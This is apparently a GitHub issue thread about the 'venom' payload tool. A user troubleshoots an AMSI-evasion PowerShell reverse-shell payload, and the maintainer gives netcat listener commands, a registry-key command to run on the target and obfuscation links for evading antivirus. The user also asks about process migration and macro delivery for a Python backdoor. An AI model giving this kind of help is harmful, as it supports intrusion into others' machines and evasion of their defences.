Listener not starting on Amsi Evasion Payload Number 1

[Vedant-Bhalgama]

Hi!

I am using that File Less Payload in Amsi-Evasion Module, The payload gets delivered successfully and I start the .ps1 script with the PowerShell On target computer, It executes successfully but on the kali side it shows Press Any Key to start Handler, I press key and the Handler doesnt starts only, How can i start the listener manually? For The ps1 script?

[r00t-3xp10it]

• 1º- i need a screenshot to see the error ..
• 2º - do you have netcat installed on attacker machine ??? because amsi evasion agents nº 1, 2, 3 requires netcat listenner ...

Remark: amsi evasion agent nº 4 does not use netcat Listenner, it uses powershell to recive the tcp connection back.

Manual start netcat listenner

sudo nc -lvp <port number>

---

Note-To-Self

Amsi Evasion sub-menu does not check for the existence of netcat on attacker side .. because netcat its by default installed on linux distros ...TODO: add a netcat check ???...

[Vedant-Bhalgama]

So do i need to install netcat on target machine? Because I already have netcat installed on kali linux

[r00t-3xp10it]

netcat its only needed in attacker machine (listenner) something its wrong with your netcat install ..

Execute the follow commands to check if nc its working fine sudo nc -lvp <port number>

xterm -T "netcat" -e "sudo nc -lvp <port number>" <-- this is the command venom uses to spawn the netcat listenner (handler)

[Vedant-Bhalgama]

Ok and as you told that you need to install xterm for chars.raw, so will pip install xterm work?

[r00t-3xp10it]

pip its for PYTHON ... apt-get install xterm <-- its the command we need to install xterm ..

Thats why your listenner does not start,, because it requires xterm console to spawn netcat .. xterm oficial webpage

[Vedant-Bhalgama]

Ok, And on the Windows machine do I haveto start the netcat listener? or the.ps1 file will start it when ran

[Vedant-Bhalgama]

Hi I am trying the Windows Os Payloads in that I am trying number 20. I run this attack and all i see is this console window. Even Windows Defender detected it.

[Vedant-Bhalgama]

HI File Less stager works now, But what can i do from netcat? Can i execute system commands? Or open Notepad?

[r00t-3xp10it]

https://github.com/r00t-3xp10it/venom/issues/63#issuecomment-654572534 <-- thats the reason why i have written amsi evasion sub-menu because those technics are beeing detected now ..

https://github.com/r00t-3xp10it/venom/issues/63#issuecomment-654573792 <-- netcat gives you access to a console prompt were you can use since cmd commands to powershell commands (the sky its the limit if you are familiarized with those languages) ... in other words: netcat allow you to interact with everything on remote host programatecly ..

[Vedant-Bhalgama]

So can i execute any command or something? Or may be upload files or download them? And can you give tips on manually making these files more Undetectable?

[r00t-3xp10it]

you can not upload/download files only by using netcat .. but we can use netcat to spawn for example ftp service that allow us to upload/download ..

Obfuscation: https://github.com/r00t-3xp10it/hacking-material-books/blob/master/obfuscation/simple_obfuscation.md

[Vedant-Bhalgama]

Alright! I just have one question now, How can I execute commands while I have the connection on Netcat?

[Vedant-Bhalgama]

HI I had a question that in Python, We can do process migration? Because I have made my own backdoor in python and now i want that it should run under a parent process such as explorer.exe

[r00t-3xp10it]

• 1º - netcat allow you to use almost all languages availabe (intalled) on target machine ... that means we have access to cmd, powershell, etc.. or interact with applications/services/etc ...

Examples

netstat -ano <-- use native appl netstat to display a list of tcp/udp connections cmd.exe /c reg add 'hkcu/software/microsoft/startup /t reg_dword /d 1 /f' <-- use cmd.exe to add registry key

• 2º - migration can be done using any language ... but i dont use very oven python so iam not the rigth perso to respond to that question ..

[Vedant-Bhalgama]

Hi! I was thinking that how can we convert our python backdoor to .ps1? Or a macro file? To XML?